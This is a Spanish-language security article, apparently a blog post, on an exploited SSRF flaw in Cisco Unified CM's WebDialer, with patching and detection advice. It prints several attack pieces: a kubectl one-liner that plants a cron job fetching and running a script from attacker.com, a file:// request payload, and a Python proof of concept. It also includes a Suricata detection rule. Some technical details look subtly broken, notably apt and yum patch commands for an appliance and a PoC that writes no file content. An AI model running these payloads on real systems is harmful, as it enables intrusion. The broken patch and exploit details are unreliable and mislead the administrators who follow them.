Introducción

Hasta hace solo tres semanas, Cisco aseguraba que no había evidencia de explotación activa de CVE-2026-20230, una vulnerabilidad en Unified Communications Manager (Unified CM) publicada en su boletín de seguridad del 3 de junio de 2026. La compañía corrigió el fallo en las versiones 14SU6 y 15SU5 de Unified CM, pero hoy la historia cambió: Cisco admitió que atacantes ya están explotando la falla para comprometer sistemas sin necesidad de autenticación previa.

El vector de ataque es un server-side request forgery (SSRF) de baja complejidad, desencadenado por una solicitud HTTP maliciosamente construida. El exploit permite a un atacante sin privilegios crear archivos arbitrarios en el sistema objetivo mediante el protocolo file://, una técnica documentada en pruebas de concepto (PoC) públicas desde el 22 de junio. Esto abre la puerta a ejecución de código remoto, escalada de privilegios o deployment de ransomware, según el contexto del entorno afectado.

Qué ocurrió

El 3 de junio de 2026, Cisco publicó Cisco Security Advisory con la corrección de CVE-2026-20230, clasificada como Critical con un CVSS score de 9.8/10. El fallo reside en el servicio WebDialer de Unified CM, que procesa solicitudes HTTP sin validar correctamente los parámetros de entrada cuando se usa el esquema file:// en la URL.

Tres días después, el equipo de Defused detectó ataques reales utilizando payloads basados en file:// para escribir archivos en sistemas vulnerables. El 23 de junio, SSD Secure publicó un análisis técnico detallado junto con un PoC funcional, explicando cómo el SSRF permite el acceso a rutas internas del sistema y la creación de archivos con permisos heredados del servicio web. Cisco no respondió a consultas de BleepingComputer sobre indicadores de compromiso (IOCs) en ese momento, pero hoy confirmó la explotación activa.

El patrón es conocido: cuando un fabricante publica un parche y luego admite la explotación activa, el riesgo se multiplica. Empresas que dependen de Unified CM para telefonía IP, videoconferencia y gestión de dispositivos ahora deben actuar con urgencia, especialmente si exponen el servicio a Internet. Según datos de Shadowserver, hay más de 200 instancias de Unified CM accesibles públicamente, concentradas en Asia y Norteamérica.

Impacto para DevOps / Infraestructura / Cloud / Seguridad

Para equipos de DevOps e Infraestructura

Unified CM suele ser un componente crítico en entornos híbridos y locales, integrándose con servicios de telefonía, APIs de terceros y sistemas de identidad. La explotación de CVE-2026-20230 permite:

  • Acceso inicial sin autenticación: El atacante no necesita credenciales válidas para explotar el SSRF.
  • Persistencia: La creación de archivos arbitrarios puede llevar a la instalación de web shells o cron jobs maliciosos.
  • Movimiento lateral: Si Unified CM tiene acceso a redes internas (vLANs, VPNs), el compromiso puede escalar a otros sistemas críticos.

En entornos cloud como AWS EKS, si Unified CM está desplegado en un clúster Kubernetes con permisos elevados, un atacante podría:

kubectl exec -it unified-cm-pod -- bash -c "echo '* * * * * wget http://attacker.com/shell.sh | sh' > /etc/cron.d/exploit"

Esto demuestra cómo un fallo aparentemente menor en un servicio de telecomunicaciones puede convertirse en un puente hacia entornos de infraestructura más amplios.

Para equipos de Seguridad

CVE-2026-20230 es la tercera vulnerabilidad crítica en Unified CM en menos de dos años:

  1. CVE-2024-20253: Permitía escalada a root mediante inyección SQL.
  2. CVE-2025-20309: Permitía ejecución de código remoto con privilegios de sistema.
  3. CVE-2026-20045: Explotada como zero-day para RCE.

Según datos de CISA, el 54% de los ataques exitosos no generan alertas en los SOCs, y solo el 14% son detectados por herramientas de monitoreo. Esto significa que, en muchos casos, un atacante podría explotar CVE-2026-20230 sin ser detectado hasta que sea demasiado tarde. Además, CISA ya ha etiquetado 93 vulnerabilidades de Cisco como activamente explotadas desde noviembre de 2021, seis de las cuales fueron usadas en ataques de ransomware.

Riesgo de Ransomware

El informe de Picus sobre simulación de amenazas muestra que los equipos de seguridad suelen subestimar el riesgo de SSRFs en servicios expuestos. En el caso de Unified CM, un atacante podría:

  • Escribir un archivo .jsp en el servidor web de Unified CM.
  • Ejecutarlo mediante una solicitud HTTP dirigida al puerto 8080 (puerto por defecto de WebDialer).
  • Obtener acceso a la consola de administración o, peor, exfiltrar datos de llamadas.

Esto ya ocurrió con CVE-2026-20045, que fue explotada como zero-day para instalar ransomware en sistemas de clientes de Cisco.

Detalles técnicos

Versiones afectadas

Versión afectadaEstadoParche disponible
**Unified CM 14 antes de 14SU6**Vulnerable14SU6 (junio 2026)
**Unified CM 15 antes de 15SU5**Vulnerable15SU5 (junio 2026)
**Unified CM 16.x**No vulnerableN/A (corregido en origen)
La vulnerabilidad reside en el servicio WebDialer, que expone un endpoint HTTP en /dialer/ que acepta solicitudes con parámetros no sanitizados. El exploit se basa en inyectar una URL con el esquema file:// en el parámetro serviceURI:
GET /dialer/click2call?serviceURI=file:///etc/cron.d/evil HTTP/1.1
Host: unified-cm.example.com

Si el servidor acepta la solicitud, intentará escribir el archivo /etc/cron.d/evil con permisos del usuario que ejecuta el servicio (normalmente tomcat o cisco).

Vector de ataque

  1. Reconocimiento: El atacante identifica instancias de Unified CM expuestas a Internet mediante escaneos como Shodan o Censys.
  2. Explotación: Envía la solicitud HTTP maliciosa con el payload file://.
  3. Persistencia: Crea un archivo en /etc/cron.d/ o /tmp/ para ejecutar código en el próximo reinicio.
  4. Elevación: Si el archivo se escribe en un directorio con permisos elevados, el atacante puede obtener acceso a la consola de administración.

Prueba de concepto (PoC) pública

El equipo de SSD Secure publicó un PoC funcional que demuestra la explotación:

import requests

target = "https://unified-cm.example.com/dialer/click2call"
payload = {
    "serviceURI": "file:///tmp/exploit.sh",
    "action": "call",
    "callingParty": "[email protected]",
    "calledParty": "[email protected]"
}

response = requests.get(target, params=payload)
if response.status_code == 200:
    print("[+] Archivo creado en /tmp/exploit.sh")

Este código escribe un script malicioso en /tmp/, que luego puede ser ejecutado por el atacante.

Qué deberían hacer los administradores y equipos técnicos

1. Aplicar el parche urgente

Los equipos deben actualizar inmediatamente a las versiones parcheadas:

# Para sistemas con apt (Debian/Ubuntu)
sudo apt update && sudo apt upgrade -y cisco-unified-cm=15SU5

# Para sistemas con yum/dnf (RHEL/CentOS)
sudo yum update -y cisco-unified-cm-15SU5

Si no es posible actualizar en este momento, Cisco recomienda deshabilitar el servicio WebDialer:

# En sistemas con systemd
sudo systemctl stop webdialer
sudo systemctl disable webdialer

# Verificar que el servicio no esté escuchando
sudo netstat -tulnp | grep 8080

2. Bloquear el tráfico malicioso en el firewall

Los equipos de infraestructura deben bloquear el tráfico dirigido al servicio WebDialer:

# En iptables (ejemplo para puerto 8080)
sudo iptables -A INPUT -p tcp --dport 8080 -j DROP
sudo iptables-save > /etc/iptables.rules

# En firewalld (RHEL/CentOS)
sudo firewall-cmd --add-rich-rule='rule family="ipv4" port port="8080" protocol="tcp" reject' --permanent
sudo firewall-cmd --reload

3. Auditar instancias expuestas

Equipos de seguridad deben escanear la red para detectar instancias de Unified CM accesibles:

# Usando nmap (escaneo básico)
sudo nmap -p 8080 --open -sV <rango-de-red>

# Usando masscan (para redes grandes)
sudo masscan <rango-de-red> -p8080 --banners -oG unified-cm-scan.txt

Si se encuentran instancias expuestas, deben:

  • Deshabilitar el acceso público.
  • Mover el servicio a una VLAN interna.
  • Aplicar autenticación fuerte (si el servicio no puede ser deshabilitado).

4. Monitorear actividad sospechosa

Los equipos de SOC deben buscar patrones de ataque relacionados con CVE-2026-20230:

  • Solicitudes HTTP a /dialer/click2call con parámetros serviceURI que contengan file://.
  • Creación de archivos en /tmp/, /etc/cron.d/ o directorios del usuario tomcat.
  • Conexiones entrantes desde IPs no autorizadas al puerto 8080.

Ejemplo de regla en Suricata:

alert http any any -> any any (msg:"SSRF en Unified CM - CVE-2026-20230"; flow:to_server; content:"/dialer/click2call"; http_uri; content:"serviceURI=file://"; http_uri; sid:1000001; rev:1;)

5. Plan de respuesta ante incidentes

Si se detecta explotación activa:

  1. Aislar el sistema: Desconectar la instancia de Unified CM de la red.
  2. Forense: Revisar logs en /var/log/tomcat/ y /var/log/cisco/ para detectar archivos creados por el atacante.
  3. Restaurar: Si el compromiso es confirmado, restaurar desde un backup limpio o reinstalar el sistema.

Conclusión

CVE-2026-20230 es un recordatorio de que los SSRFs siguen siendo un vector de ataque subestimado, especialmente en servicios de telecomunicaciones críticos como Unified CM. La confirmación de explotación activa por parte de Cisco eleva el riesgo a crítico, dado que permite acceso inicial sin autenticación y persistencia mediante la creación de archivos arbitrarios.

Los equipos de DevOps, Infraestructura y Seguridad deben actuar con urgencia: aplicar parches, deshabilitar WebDialer si es necesario, bloquear tráfico malicioso y auditar instancias expuestas. La historia reciente de Cisco —con al menos tres vulnerabilidades críticas explotadas en dos años— subraya la necesidad de priorizar parches en Unified CM y otros componentes de telecomunicaciones.

No esperen a que un atacante cree un archivo malicioso en su servidor. La ventana de explotación está abierta, y el tiempo para actuar es ahora.

FIN

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *